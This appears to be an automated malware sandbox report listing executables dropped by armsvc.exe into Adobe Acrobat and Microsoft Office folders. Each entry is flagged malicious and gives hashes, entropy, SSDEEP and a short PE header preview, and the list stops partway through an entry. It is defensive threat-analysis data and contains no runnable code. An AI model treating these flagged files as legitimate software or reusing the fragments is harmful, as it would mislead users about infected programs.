                                                                                                                                                                              SHA-256:533B6D66DC6AE173C76E824A7369B70FEFA34CBCCD775FCCCC0A41EBABFDEEA0
                                                                                                                                                                              SHA-512:3F5233F368CD2B196F5261175499D898BA6467D0DABBD8AE8B2A247F207B3ABD79EAAA4538EFE7C57D9B1F1A326991E01A69F26A7FA3880F20DFD575089D2D5E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@..............................$.....[..... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...`...0......................@...................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1409024
                                                                                                                                                                              Entropy (8bit):4.686416949757264
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:xWBW1/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:8D4072606BDF58C2431CDD04A36B5535
                                                                                                                                                                              SHA1:7E8F8AF3E5B5157D614858980EB03076F6D36587
                                                                                                                                                                              SHA-256:E3EFEE65424F112466BD07D290C02F2C9C6126D4ADEBA1A0B72E79F43556CBB8
                                                                                                                                                                              SHA-512:25A85D1EA0A1851E9B8281FD286D0516471C2C7B21955750974F91A0885818E8786585225DBD4A0D6B5E5A8195718FC0CBE898747D60F991B4940FBC32371AB4
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................p .....[..... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1683968
                                                                                                                                                                              Entropy (8bit):7.221664439331996
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:1+GtCi27mVdyT+a0wLNiXicJFFRGNzj3:gmd27V7wRGpj3
                                                                                                                                                                              MD5:C415552EC2A6B5BFCEA33A64B495E02B
                                                                                                                                                                              SHA1:E536DC8FD5FABA576E46432349A77A3DAD960962
                                                                                                                                                                              SHA-256:A79A214DF84D47833AA9811E920F5C4231024CDF56C3926A9131208666CFEC06
                                                                                                                                                                              SHA-512:94BD3B5E4E8546826AC0A4F5256C799D88F197B086BD461FB1CB1D76B36CEA822F3BF5BCFAF09E0027EAFB3F0F9B65529B3A11C85E487AA48A2D4A6BBA478516
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3110912
                                                                                                                                                                              Entropy (8bit):6.646865976457307
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:qU198PzqkltcT0gViqNfBZQiOIK5Ns6YZ82PTJeYXLNiXicJFFRGNzj3:/9NfHOIK5Ns6qR9F7wRGpj3
                                                                                                                                                                              MD5:8E240A7B27C75AD1D69838DB06958AF4
                                                                                                                                                                              SHA1:A149B03F00C79CE9522C26565FCC5C6DAA8ADF6B
                                                                                                                                                                              SHA-256:0EA6577A2F85CC8D19494680EAD72822B913C4EFEB14DEF1FF6450FD70E9521C
                                                                                                                                                                              SHA-512:93FB85B56E7A5610214AD12AA9549EA0763DCCF3E0860E8641B4D9E06D21BD305A9FC3CB9EF23E1D463CB0332F41E0AC5778B943F083A05A06A1BB24ECAED95E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......./... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1743872
                                                                                                                                                                              Entropy (8bit):5.136839309159564
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:okIWTUQcydf/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:oxKUoLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:D1401D18952F3A041A991A5BBD39B8C7
                                                                                                                                                                              SHA1:767348545997D3C61C542F803637759E79BB4FE3
                                                                                                                                                                              SHA-256:AA03FB3303F0DA6DFC70D3C007097F9C72919346F455024F7159C269067FC190
                                                                                                                                                                              SHA-512:409ED5C57C231A404983F0A400F6906664C81545274721FE010684155C0EDC07C64BE5EF4474DC6BD882017B4E42C4854D4DC7AEF5B5D5BCF665FF17A2117BED
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@..............................%......V.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...p...@......................@...................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1494016
                                                                                                                                                                              Entropy (8bit):4.896119933788027
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:wO+qBg/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:n+LLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:62976C5C4E6A3FBA1D3DB8464B64C3D8
                                                                                                                                                                              SHA1:60749729AD2BDAF8C0AD29CC03F11EECA28055A7
                                                                                                                                                                              SHA-256:15813347AA1DCD1CD33099DE0056E519F3D1BCF224260494C77F8EB5885421FF
                                                                                                                                                                              SHA-512:7D089DDAB1EE902681A8F17F047441AD36D44F577B46E3580EC0BF9415BDB03081B447C1AF150D47C46069480B82EBBC077EA7AFB69151E033CA0557825A6E89
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@...........................!......n..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1298944
                                                                                                                                                                              Entropy (8bit):4.521168423763117
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:xiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:4AE3FB28F13C0B8D59FDD376127B6466
                                                                                                                                                                              SHA1:5E893B74C40E2249B169493426BEA7A9C48D8ECF
                                                                                                                                                                              SHA-256:9484E6E4CB76231A91A4FC7CDEEE88BB4DA96FE9080CA2FFE77A80BD9CE2ECDC
                                                                                                                                                                              SHA-512:2C3E58814B929891CAD1113689F726B659B0396C77EA62CE16E7C82F1250FF56834647CD4A12CCF052FC8D493CCCA1EA1533619CD45AA9A2E890F5F4B7F6F218
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@..................................... .... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...`...........2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1317376
                                                                                                                                                                              Entropy (8bit):4.550856070012462
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:WQiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:N/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:AF91E3A41B842D2EF0FDA4440F34B353
                                                                                                                                                                              SHA1:EBC85DD235F6F7208DF05723B394F523BBDE4FB3
                                                                                                                                                                              SHA-256:2ED40CC4945D9CF747E4ADD481D9F1BB234EBF515B558760CA06405878408E0E
                                                                                                                                                                              SHA-512:C2E5C83330AD17CDBD7526EB90AB8B984808A5CF190DA669349627FD3DD957D45AA310209A668A54414E58F48D4CB4C62EC336C9889E05AD6D025EC23CEB50A1
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.....................................W.... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...`...........z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4151808
                                                                                                                                                                              Entropy (8bit):6.496752054663036
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:4tuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755BLNiXico:4jEIa3HIEWOc537wRGpj3
                                                                                                                                                                              MD5:585F851F56A08D2E9CCB2412E6E896D2
                                                                                                                                                                              SHA1:201C52A3BB12700D9FC697811C101E0DDE598280
                                                                                                                                                                              SHA-256:9896FF33EB31B9A3445429651845443376E8D54405C06689B7BF40421FB5D70A
                                                                                                                                                                              SHA-512:E808E667D7F7FAB2B76030D14D876B3CF0966E6D76ADFB194CB65933C4A41832FE28B2B11ED3BC21AD77FD41006C21B82E72F9B91B588028EF27A90DA4482DB2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):59941376
                                                                                                                                                                              Entropy (8bit):7.999353935985061
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:1572864:0Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:rXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                              MD5:29A631C6E5A948476AFAE5EA442AD819
                                                                                                                                                                              SHA1:ABD38E463E5A1BAAB3B9BC0BA48040AC4EB8ED50
                                                                                                                                                                              SHA-256:628651BC82636909E174044C5B10733AF07890B2EBF99B08D243A8235090E035
                                                                                                                                                                              SHA-512:8DD7BDDA5F49051D450350A20910C7FBD407E895D2767FE38F73AFA0F5998EFD118568AD96E87B737919561100DF90EFDD60BCFF75C9882FFBD982D0F704F4F2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......wu.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1385984
                                                                                                                                                                              Entropy (8bit):4.7034590142747135
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:IjkYuE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:s/uELNiXicJFFRGNzj3
                                                                                                                                                                              MD5:628FE1B14F9DF3601C27E15923167F59
                                                                                                                                                                              SHA1:536472243CA58F3DD03C5A5972E1B26FAB9CBC3D
                                                                                                                                                                              SHA-256:51D687C2770180D3A070CDBB66203D274D516DB54ABBA9CBDEC5D2BA21092840
                                                                                                                                                                              SHA-512:0E5EF0BAE63185EB270A8CF6D82B00720DDB4EFACB582D3D963DBAA58AD6C5035C73C0FCEC228570E89927F62628F11DF166DB3DD3680E142FD3B8AEF3251B6D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.......................... ..............................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...p...........v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1540608
                                                                                                                                                                              Entropy (8bit):4.935000317982403
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:+xwSJzkrmZsY/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:+yIkrKsYLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:45A3CF375495AE709AE2C88E93164CA0
                                                                                                                                                                              SHA1:F982E64250667C882513477E7C8DD47A4E07BB8F
                                                                                                                                                                              SHA-256:D135AA35AC5D893E6E84813C078D92B105B0384641D91F18AC0B2FDB6F90946D
                                                                                                                                                                              SHA-512:101AFBBA0A01CE2B8089C9DB449C7899D81655B6C1DE7B7C74816A18EB6500C359F1DB1F4F846592B8029FCAD45BD87531F58193127F568EBD8CA324D4892021
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.............................."........... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...`...0......................@...................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1804800
                                                                                                                                                                              Entropy (8bit):5.2474719363604025
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:UHQJLIRZvsnNN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:UHQJLy4NLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:3FB0F1E8352F5B4BE3480BB7977D82C6
                                                                                                                                                                              SHA1:24EF6E6CF7276B529EF3451DEE3B377E7D66772F
                                                                                                                                                                              SHA-256:BD604688E312CEAC7DBB73EAC0E1810FE2D33EB577C2DF2EA0AEF3860E1BC432
                                                                                                                                                                              SHA-512:4794C956AEC672618DDE50DF9D5C99600D6C72C50BE08116053C0BB6CFCC6B8F46E3E27C9DBAB78C1A9BE7662B1062BF5417650735A442BABCB92D54AD0263C5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@..............................&......_.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5365760
                                                                                                                                                                              Entropy (8bit):6.447931608305787
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:aUZujDjDjDjXmXgoz2PsapFQr97dRpqbeE8U2Izwot+bdro4O8b8ITDnlggyJ1kF:1WmXL6DE97dRpKuoQbgu7wRGpj3
                                                                                                                                                                              MD5:D732808B62774CB29FC81935B01222EB
                                                                                                                                                                              SHA1:559E911B3D0CADF93725E8FE3D2D1C6735FCFCD0
                                                                                                                                                                              SHA-256:DD1DCA03F9B7B1CB0116D85CCED9D1838522349001812D3EA1933B9D792E3009
                                                                                                                                                                              SHA-512:584D48910AB48A82AFC470C5FD6F6B1B6797B7448212BC204BD17A53145E91AE0AA4D67D02465C73268AADB10EB049C694419E9E9A1F6A0DD0D4C4211222E58A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3163136
                                                                                                                                                                              Entropy (8bit):7.971281628653374
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:HrZ23AbsK6Ro022JjL2WEiVqJZh7wRGpj3:LJADmmxL2WEoCZlF9
                                                                                                                                                                              MD5:C92A6DE5448DB51CC32A72C8CA9326BE
                                                                                                                                                                              SHA1:4AC3256BDFAB540B0657A6635C9962C2F2E7BF3F
                                                                                                                                                                              SHA-256:E1C0278E3AF4FF09E6080515AFBAE2F6AEA4F00B3E795152D5333ED1EC732DD1
                                                                                                                                                                              SHA-512:0553D127F9B1AF315CE8CCC7EB4CAC7CFC3642A0A1B33FBDB6C14A324CB9F2FBC695CF7C9D7FB2C087BF28B117C03C5D2FB32D86FF4A09EEB2367240F8F8F203
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.......0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1213440
                                                                                                                                                                              Entropy (8bit):7.194646283316611
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:nfrYY42wd7hlOE9fpkEE64I/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:+/9xrSILNiXicJFFRGNzj3
                                                                                                                                                                              MD5:E2834CA78521A7A29314A87E0CFD2346
                                                                                                                                                                              SHA1:D157F71A9EE726BD094EF372FB1AA959823891F6
                                                                                                                                                                              SHA-256:A78E529054F889A3883B77DD8DD5392A2A0A6C68BD3EAD49BD520BBBD8946DDD
                                                                                                                                                                              SHA-512:1265DD968D5FC06D949D84EAC8280AC609AC08DBE592C30202A37A51463C4993EC6018E9F7CF417531198166007916D603D59B767AE7999D9B8F0ACAD583EA4E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ........... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1544192
                                                                                                                                                                              Entropy (8bit):4.836095188616976
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:vzNKU/53/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vzNr/53LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:275F68B3B78D5000BECB81AB9E961D06
                                                                                                                                                                              SHA1:B199829A3BEA42D000FA945A6804206A1B7C3235
                                                                                                                                                                              SHA-256:D32C9C9DD66E4A85F0C3118743C90A3BF05CD7679AB8FCCD1DFF97A63C9590F6
                                                                                                                                                                              SHA-512:877B900F9BBD533AA60FF51707EDB49A7D1E64CC1513A802935831E581D592B5CEFE3B3ADE378EDBE5C28C2A0ACE8ED6F006D76AB536AAA7C6ECF53A24C097B8
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................`"......0.... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5855744
                                                                                                                                                                              Entropy (8bit):6.572130941377291
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:vALuzDKnxCp3JKCrPJzruaI6HMaJTtGby7wRGpj3:4aGg3cuPIaI6HMaJTtGb2F9
                                                                                                                                                                              MD5:0BB3C93494CF0D972865D0A323A6A957
                                                                                                                                                                              SHA1:952538C6820F43EE3B9123A892F1B278B698D42B
